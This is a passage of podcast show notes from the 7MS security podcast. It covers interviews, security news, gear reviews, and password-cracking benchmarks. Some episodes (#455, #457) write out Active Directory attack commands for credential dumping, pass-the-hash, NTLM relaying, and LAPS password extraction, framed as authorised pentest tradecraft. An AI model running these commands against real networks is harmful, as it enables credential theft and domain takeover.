Vec:1 Speed.#*.........: 15869.5 MH/s Hashmode: 1500 - descrypt, DES (Unix), Traditional DES Speed.#1.........: 1752.8 MH/s (95.32ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#2.........: 1729.3 MH/s (96.65ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#3.........: 1749.5 MH/s (95.53ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#4.........: 1740.6 MH/s (96.01ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#*.........: 6972.3 MH/s Hashmode: 500 - md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) (Iterations: 1000) Speed.#1.........: 24882.8 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#2.........: 24828.0 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#3.........: 24865.7 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#4.........: 24849.6 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#*.........: 99426.0 kH/s Hashmode: 3200 - bcrypt $2*$, Blowfish (Unix) (Iterations: 32) Speed.#1.........: 69071 H/s (54.00ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#2.........: 68818 H/s (54.25ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#3.........: 68926 H/s (54.13ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#4.........: 69013 H/s (54.04ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#*.........: 275.8 kH/s Hashmode: 1800 - sha512crypt $6$, SHA512 (Unix) (Iterations: 5000) Speed.#1.........: 386.4 kH/s (84.04ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 377.9 kH/s (85.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 372.3 kH/s (86.76ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 382.7 kH/s (84.51ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 1519.3 kH/s Hashmode: 7500 - Kerberos 5, etype 23, AS-REQ Pre-Auth Speed.#1.........: 1177.0 MH/s (71.08ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#2.........: 1175.4 MH/s (71.17ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#3.........: 1171.5 MH/s (71.28ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#4.........: 1177.4 MH/s (71.05ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#*.........: 4701.3 MH/s Hashmode: 13100 - Kerberos 5, etype 23, TGS-REP Speed.#1.........: 1068.5 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#2.........: 1069.4 MH/s (78.25ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#3.........: 1068.4 MH/s (78.32ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#4.........: 1068.6 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#*.........: 4275.0 MH/s Hashmode: 15300 - DPAPI masterkey file v1 (Iterations: 23999) Speed.#1.........: 148.5 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#2.........: 148.4 kH/s (93.99ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#3.........: 148.5 kH/s (93.96ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#4.........: 148.4 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#*.........: 593.8 kH/s Hashmode: 15900 - DPAPI masterkey file v2 (Iterations: 12899) Speed.#1.........: 80610 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 80606 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 80596 H/s (80.48ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 80378 H/s (80.46ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 322.2 kH/s Hashmode: 7100 - macOS v10.8+ (PBKDF2-SHA512) (Iterations: 1023) Speed.#1.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#2.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#3.........: 1002.1 kH/s (78.62ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#4.........: 1002.7 kH/s (78.58ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#*.........: 4009.6 kH/s Hashmode: 11600 - 7-Zip (Iterations: 16384) Speed.#1.........: 897.6 kH/s (82.05ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#2.........: 896.4 kH/s (82.09ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#3.........: 893.3 kH/s (83.60ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#4.........: 912.4 kH/s (81.95ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#*.........: 3599.7 kH/s Hashmode: 12500 - RAR3-hp (Iterations: 262144) Speed.#1.........: 116.6 kH/s (60.91ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#2.........: 111.4 kH/s (63.61ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#3.........: 111.6 kH/s (63.63ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#4.........: 115.0 kH/s (61.81ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#*.........: 454.7 kH/s Hashmode: 13000 - RAR5 (Iterations: 32799) Speed.#1.........: 93248 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#2.........: 93202 H/s (54.72ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#3.........: 93009 H/s (54.70ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#4.........: 93241 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#*.........: 372.7 kH/s Hashmode: 6211 - TrueCrypt RIPEMD160 + XTS 512 bit (Iterations: 1999) Speed.#1.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#2.........: 672.1 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#3.........: 671.4 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#4.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#*.........: 2687.9 kH/s Hashmode: 13400 - KeePass 1 (AES/Twofish) and KeePass 2 (AES) (Iterations: 24569) Speed.#1.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#2.........: 111.1 kH/s (122.55ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#3.........: 111.2 kH/s (122.58ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#4.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#*.........: 444.7 kH/s Hashmode: 6800 - LastPass + LastPass sniffed (Iterations: 499) Speed.#1.........: 5944.3 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#2.........: 5942.0 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#3.........: 5939.0 kH/s (35.67ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#4.........: 5943.8 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#*.........: 23769.0 kH/s Hashmode: 11300 - Bitcoin/Litecoin wallet.dat (Iterations: 200459) Speed.#1.........: 11370 H/s (73.48ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 11355 H/s (73.50ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 11369 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 11370 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 45464 H/s

    For a real world example, I had ~1,500 NTLM hashes to crack that I ran through some of the hatecrack methodology, and here's how the instance performed:

    • 100 LM hashes discovered, all cracked in 7 minutes (heh, 7 minutes :-)
    • Ran hatecrack's quick crackw ith no rules: done in 7 minutes, cracked 108 accounts
    • Quick crack against one rule to rule them all: ran in 25 minutes, got got 271 new passwords
    • Ran extensive hatecrack methodology, it ran for a little over 2 hours and got 88 new passwords.

    All said and done, about 1/3 of the passwords cracked in about 3 hours. Not bad!

    Don't forget, the second you're done with your cracking efforts, SHUT THE BOX DOWN! Otherwise you're in for a sour surprise come AWS billing day :-(

    On a few personal notes:

    • Last Comic Standing was the show I couldn't think of during the episode :-)

    • After a toxic non-toxic foam pit incident a few years ago, my family and I had another injury this weekend with a rented waterslide - the fun ended in a concussion!


    7MS #473: Interview with Nikhil Mittal Jun 24, 2021

    Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics:

    • How Nikhil first got involved in Pentester Academy

    • Nikhil's hacker origin story

    • How does Nikhil feel about his tools being used by baddies?

    • What security tools/defenses would be good for SMBs to focus on?

    • Active Directory security - is all hope lost?

    • Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?


    7MS #473: Interview with Nikhil Mittal Jun 24, 2021

    Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics:

    • How Nikhil first got involved in Pentester Academy

    • Nikhil's hacker origin story

    • How does Nikhil feel about his tools being used by baddies?

    • What security tools/defenses would be good for SMBs to focus on?

    • Active Directory security - is all hope lost?

    • Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?


    7MS #472: Interview with Christopher Fielder Jun 16, 2021

    Today our good pal Christopher Fielder from Arctic Wolf is back for an interview three-peat! He joins Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I to talk about all things ransomware, including:

    • How the Colonial Pipeline incident may have started from a weak VPN cred with no MFA. Silver lining (?) - they got some of the $ back.

    • Was the federal government's response good enough? What should the government be doing to better handle and manage ransomware?

      • Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd:
        • Use 2FA (make sure that all accounts are using it!)
        • Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.President
        • Have users that haven't logged in for X days get automatically locked out
        • Train your users - consider Arctic Wolf's managed security awareness offering
        • Detect early signs of compromise like Kerberoasting
        • Lock down your DNS egress to only specific servers so that it doesn't run "wide open"
        • Leverage good threat intel

    7MS #471: Cyber News - Ransomware Should Run Somewhere Edition Jun 09, 2021

    Hey everybody, happy June! Our pal Joe is back to cover some great security stories with us, including:

    • Peloton's leaky API

    • Some Colonial Pipeline discussion (story 1, story 2)

    • Amazon Sidewalk doesn't really share your Internet connection with neighbors/strangers. The Hacker News article doesn't do an awesome job of clearing that up either.


    7MS #470: First Impressions of Meraki Networking Gear Jun 02, 2021

    Today we're doing something new - a first impressions episode of Meraki networking gear. Note: this is not a sponsored episode, but rather a follow up to episode #460 where I talked about throwing all my UniFi gear into the ocean and replacing it with Meraki gear. At the end of that episode I asked if anybody was interested in a "first impressions" of the gear, and it turns out (at least 6) people are interested, so here we are! TLDL:

    Pros

    • Super easy plug-and-play setup
    • The mobile app can control just about everything - ports, SSIDs, Internet on/off timers and more!
    • Verbose logging
    • Top-notch support from experienced technicians

    Cons

    • Cost! Big $$$
    • "Cloud only" - can't install this gear in a LAN-only configuration
    • Client VPN is a bit clunky to setup

    7MS #469: Interview with Philippe Humeau of CrowdSec May 26, 2021

    Hey friends! Today we're talking with Philippe Humeau, CEO of CrowdSec, which is "an open-source massively multiplayer firewall able to analyze visitor behavior & provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global IP reputation database to protect the user network."

    I came into this interview not knowing much at all about CrowdSec, so I peppered Philippe with questions such as:

    • What is CrowdSec?

    • What problem does it solve?

    • Who are your competitors?

    • You're open source...so how do you make $? What's your five-year plan?

    • You're dealing with a lot of data and metrics...how are you handling data privacy laws and concerns such as GDPR?

    • What if I fall in love with CrowdSec and want to contribute to making it better?

    It was a really fun, transparent and energetic interview - hope you enjoy it!


    7MS #468: Eating the Security Dog Food - Part 3 May 20, 2021

    Today we continue the series on eating your own security dog food! Specifically, we talk about:

    • Keeping a log and procedure for sanitizing systems

    • Keeping a log and procedure for provisioning systems

    • A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire:

    wmic useraccount where "Name='LocalAdminAccount'" set PasswordExpires=false
    • If you want more tips on building pentest dropboxes, check out this series

    Oh, and today's song that I sang obnoxiously is If I Were a Dog.


    7MS #467: How to Succeed in Business Without Really Crying - Part 9 May 12, 2021

    Hey everybody! I stayed in a hotel for the first time in over a year and boy oh boy...I hope I didn't get COVID from the bedsheets!

    Anyhow, on that journey I thought of some things that I think will help your business on the marketing/project management/sales side to be more successful and less annoying. DISCLAIMER: I have no formal training in these areas, but I've been on both sides of the table for a number of years, and I think I'm getting a better idea of what clients do and don't like during the sales process. These things include:

    • Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something!

    • Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelines and key contact information. We update that as often as the client likes.

    • Personalize responses to Web leads - if you have an info@ or sales@ address for your business, I think you should personalize the response you give folks who write in. They wrote you for a reason! Don't just copy/paste some generic "Hey you wanted info about our company so here it is blah blah blah" response, that doesn't make people feel like you give a rip about their needs. Think of something personal to say in the reply. "Oh, I see you're in Minnesota. I'm a big Twins fan!" Something like that. Simple, easy and personal.

    • Don't sign people up for junk without asking - in this episode I give an example of a vendor we looked at (but didn't select) for some services, and the company decided to automatically sign ups up for a bunch of electronic and paper mailings. That's super annoying!

    • Don't stink at LinkedIn - in the last episode of this series, I told you about a guy who (to me) wins LinkedIn and the Internet because he sent me a personalized video LinkedIn invitation - it was awesome! Be more like that guy, and less like the mosquitoes who send invites like "Hi, I noticed you're human and figured we should be LinkedIn BFFs" and then sign you up for a non-stop barrage of sales pitches!

    • Bug people "just enough" - if you've had an awesome scoping call for a potential project and the client has received and reviewed the SOW, stay in touch with them periodically - even if it feels like you're being ghosted.


    7MS #466: Attacking and Defending Azure AD Cloud (CARTP) May 05, 2021

    Welp, I need another security certification like I needed a bunch to the retinas, but even after all the fun (and pain) of CRTP I couldn't help but sign up for the maiden voyage of Attacking and Defending Azure AD Cloud - a.k.a. CARTP. This cert comes to us from our friends over at Pentester Academy, and is all about pwning things in Azure AD which is mostly new ground for me.

    I this episode I talk about some of the TTPs covered in week 1 of this course, as well as:

    Likes:

    • Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week)

    • Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from.

    Dislikes:

    • On Saturdays I'm a sleepy Brian. :-)

    • I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch.

    • Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with all the notifications. It's also frustrating that the instructor takes questions from Discord sometimes without repeating the question, thus making it hard to figure out what everybody was talking about if I watch the Zoom reply.


    7MS #465: Cyber News - The FBI Might Be Getting Into the IR Biz Edition Apr 28, 2021

    Hey friends! Today Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I talk about some of our favorite news stories, including:

    • FBI removes hacker back doors
    • NSA: 5 security bugs under active nation-state cyberattack
    • Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it. On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean
    • Codecov users warned after backdoor discovered in devops tool

    7MS #464: Interview with Christopher Fielder of Arctic Wolf Apr 22, 2021

    Today our friend Christopher Fielder of Arctic Wolf joins us on the show again (check out his first appearance in episode #444 - this time to talk about the security journey, and how to start out in your "security diapers" and mature towards a stronger infosec program. Specifically, we talk about:

    • When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals.

    • Early in this process, you should inventory what you have (see CIS controls) so you know what you need to protect. A few tools to help you get started:

      • Nmap
      • Rumble
      • LanSweeper
      • Witnessme
    • As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!"

    • Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-stoppers like Hafnium early)

    • Limiting administrative privileges is SUPER important - but don't take our word for it, check out this report from Beyond Trust for some important stats like "...enforcing least privilege and removing admin rights eliminates 56% of critical Microsoft vulnerabilities."

    • Install LAPS, because if an attacker gets local admin access everywhere, that's in many ways just as good as Domain Admin!

    • Train your users on relevant security topics. Then train them again. Then....again. And after that? Again.

    • There are many ways to conduct tabletop exercises. They don't have to be crazy technical. Start with the internal tech teams, practice some scenarios and get everybody loosened up. Then add the executives to those meetings so that everybody is more at ease.

    • How do you know when it's time to ask for help from an outside security resource?

    • Not sure what kind of shape your company's security posture is in? Check out Arctic Wolf's free security maturity assessment.


    7MS #463: DIY Pentest Dropbox Tips - Part 5 Apr 14, 2021

    In the last two episodes of this series (#449 and #450) we've been diving into how to not only speed up the process of spinning up a DIY pentest dropbox, but how to automate nearly the entire build process!

    In today's episode we talk specifically about how to streamline the Windows 10 build process. As previously mentioned, this article is awesome for creating a core Win 10 answer file that will format C:, setup a local admin, login once to the configured desktop and then do whatever things you want it to do. Personally, I like having a single batch file get fired off that:

    • Sets the timezone with tzutil /s "Central Standard Time"

    • Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0

    • Grabs and runs a PS file that does a ton of downloading and unzipping of files with:

    invoke-webrequest https://somesite/somefile.zip -outfile c:\somewhere\somefile.zip expand-archive c:\somewhere\somefile.zip -destinationpath "c:\somewhere\extracted\"
    • Installs Windows updates with:
    Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot
    • Sets a new name for the machine:
    Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!"
    • Does a set of actions depending on the IP range with this code (which sets the IP address to a variable and then does stuff if the machine sits in that subnet):
    $ip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] f ($ip -like "192.168.0.*") { Invoke-Webrequest https://somesite/somefile.ps1 -OutFile c:\someplace\somefile.ps1 }

    Also, I talk in this episode about how I try to host these "seed" files as securely as possible using Amazon Lightsail instances, the built-in firewall, and LetsEncrypt.


    7MS #462: Pentesting with the Hak5 Key Croc Apr 07, 2021

    Today we talk through our first engagement using Hak5 Key Croc to steal and exfil data. In the past, my internal monologue when a new Hak5 toy is released sounds like this:

    1. "I certainly don't need another Hak5 doo-dad! The last one didn't ever work that great, and ended up in a drawer full of past Hak5 doo-dads that didn't work that great."

    2. "Whaaaaat? A new cool and hip video for the INSERT_CATCHY_HAK5_TOOL_NAME is out? Pffft. I don't need that."

    • 5 seconds go by...
    1. "Well it's just $100, shut up and take my money!"

    2. "It came in the mail today! It has a cool envelope and everything!"

    3. "Hrm, I followed the quick start video and 3 of the 10 steps don't work for me. I'll hit the forums. Huh, everybody seems to be having this problem.

    • 5 days go by...
    1. "Neat! With a little help from SassyGal67 and StarWarsFreak_XXL on the forums, I hacked together my own fix for these issues. Now the core functionality of the device works, but the GUI is totally broken and you have to factory reset it with every use. Cool!"
    • Deep breath. Tosses doo-dad in a drawer full of past Hak5 doo-dads that didn't work that great.

    So with all that said, was our experience with the Key Croc any different? Check out today's episode to find out!


    7MS #461: Tales of Internal Network Pentest Pwnage - Part 26 Mar 31, 2021

    OK I probably say this every time, but I'm gonna say it again: this tale of pwnage is my one of my favs - and not because of the tools/tradecraft, but because of why the company needed our help in the first place. I think I'd file this under the category of "rescue and recovery mission" more than a pentest, but it was a total blast.

    I also cover a few tangents, including how COVID shot #2 gave me nightmares about leprechauns and indirectly caused me to de-pants in front of a large Webinar audience.


    7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean Mar 24, 2021

    Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value.

    Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit unhealthy levels of rage while working with it...and subsequently completely ripped it all out of the wall and threw it in a plastic bin.

    Let me say it one more time: if you don't like rants of rage, skip this episode and we'll see you next week!. If you want to hang in for this clown show, you'll be treated to some of the following highlights:

    • How I did not pirate Boson NetSim

    • How I fell in love with the Edge Router X as an up-and-coming network guru

    • The schedule isn't up, but I'm speaking at Secure360 this year!

    • My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh?

    • The Dream Machine GUI (at the time) doesn't have all the options one might need to stand up a site to site VPN. Neat.

    • After a firmware update, my wifi started going down from 8:00 a.m. - 8:07 a.m. every morning. Were one of you hacking me? WERE ONE OF YOU HACKING ME!

    • Once I got a BeaconHD, I got a new fun issue where if you were connected to it and submitted a wifi voucher, the Beacon wouldn't properly recognize it and let you on the Internet until about 5 minutes later. Guests loved that! And by "loved that" I mean "hated that."

    • After upgrading UDM firmware again, a new nifty issue popped its head up which broke all my inter-VLAN rules. Yay!

    • I threw hundreds of dollars at new UniFi switches and access points to solve all these problems, and everything worked perfectly (until it didn't).


    7MS #459: Cyber News - Microsoft Exchange Makes the World Cry Edition Mar 17, 2021

    Happy mid-March! Our good pal Gh0sthax joins us today for another hot dish of cyber news! Stories include:

    • Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory, the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions

    • SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day. In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch!

    • Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are:

      • Out of date and/or unsupported OS = bad
      • Weak credentials = bad
      • Connecting this type of equipment directly to the Internet instead of MFA + VPN = bad

    CISA has a great breakdown of this incident as well.

    • Webshell use has doubled since last year - this article brings back some happy/frustrating OSCP experiences. To better protect your org from being pwned with Web shells, check out NSA's list of vulnerabilities commonly exploited to plant web shells

    • Some great feedback from the last cyber news episode - a podcast listener offered a different take on the "sudo bug that gives root access story" that we discussed last month.


    7MS #458: Interview with Tanya Janca Mar 11, 2021

    Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple!

    Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love with application security and eventually starting a company of her own. Gh0sthax and I sat down with Tanya over Zoom to discuss:

    • How to overcome your fears and present at conferences, write blog posts and even start your own company!
    • How to deal with online jackwagons who troll you online at conferences
    • The importance of finding a mentor and mentoring others

    Also, here are a bunch of handy links and hashtags Tanya shares throughout the interview:

    • Bob and Alice Learn Application Security - Tanya's book, available on Amazon
    • Women of Security (WoSEC)
    • We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life
    • We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone create secure software."
    • Tanya's music on Spotify
    • #CyberMentoringMonday - a hashtag that Tanya and other security professionals monitor to help people connect with cyber mentors
    • InsiderPHd - has a safe space for bug bounty hunters to learn and collaborate
    • WeAreHackerz - "You are welcome to join WeAreHackerz if you identify as a person of a marginalized gender, including but not limited to non-binary individuals, women (trans and cis), trans men, genderqueer, etc. We welcome members across all nationalities, races, religions, ages, or other characteristics that make each of us unique."
    • Security in Color

    7MS #457: Tales of Internal Network Pentest Pwnage - Part 25 Mar 04, 2021

    Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:

    • Get a cmd.exe spun up in the context of your AD user account:
    runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"

    Then get some important info in PowerView:

    • Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!

    • Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!

    • Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!

    Once you know where you have local admin access, lsassy is your friend:

    • lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server

    Did you get an admin's NTLM hash from this dump? Then do this:

    • crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED

    (Pwn3d!) FTW!


    7MS #456: Certified Red Team Professional - Part 4 Feb 25, 2021

    Hello friends! Today, Joe (Gh0sthax) and I complete our series on CRTP - Certified Red Team Professional - a really awesome pentesting training and exam based squarely on Microsoft tools and tradecraft. Specifically, Joe and I talk about:

    • We don't think the training/exam is for beginners, despite how its advertised
    • Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets
    • Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!)
    • Watch the walkthrough videos. We repeat: WATCH THE WALKTHROUGH VIDEOS!
    • Although not required, we highly recommend capturing all the flags laid out for you in the lab environment
    • Know how to privesc - using multiple tools/methods
    • It would be to your advantage to understand how to view/manipulate Active directory information in multiple ways
    • You start the exam with no tools. So how will you be ready to upload/download tools into the exam environment so you make the most of your exam time?
    • Tool X might give you wrong results - or none at all - in the lab. Do you have a backup tool Y and Z that can serve the same purpose?
    • You want to be very good at Kerberos ticket crafting!
    • Know all the mimikatz commands and switches and when to apply them

    7MS #455: Tales of Internal Network Pentest Pwnage - Part 24 Feb 19, 2021

    Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:

    • I got to use some of my new CRTP skills!

    • Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:

    Get-DomainUser -PreauthNotRequired
    • Check for misconfigured LAPS installs with Get-LAPSPasswords!

    • The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!

    • When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!

    • SharpShares is a cool way to find shares your account has access to.

    • I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information

    • Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:

    sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com

    Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin!

    • Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!

    • Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)


    7MS #454: Cyber News - Lets Switch to Typewriters Edition Feb 11, 2021

    Happy almost-mid-February! Today Gh0sthax cooked up some great news stories for us to chew on, including:

    • Sudo bug gives root access to mass numbers of Linux systems!

    • What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English

    • Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want

    • Sonicwall was hacked using zero days in its own products. After recording this news segment, Sonicwall issued an updated statement on the situation


    7MS #453: Interview with Marcello Salvati Feb 04, 2021

    Today's featured interview is with Marcello Salvati of Black Hills Information Security. Marcello is a.k.a. byt3bl33d3r, and known for his many contributions to the security community. We here at 7MS first became familiar with his work after using CrackMapExec on our penetration tests, and today we sat down with Marcello to discuss:

    • Brian's Chris Farley moment with Marcello

    • Marcello's infosec origin story

    • CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME

    • Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord.

    • What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding?

    • What the heck is Nim and why is Marcello so excited about OffensiveNim?


    7MS #452: Enterprise Attacker Emulation and C2 Implant Development Jan 28, 2021

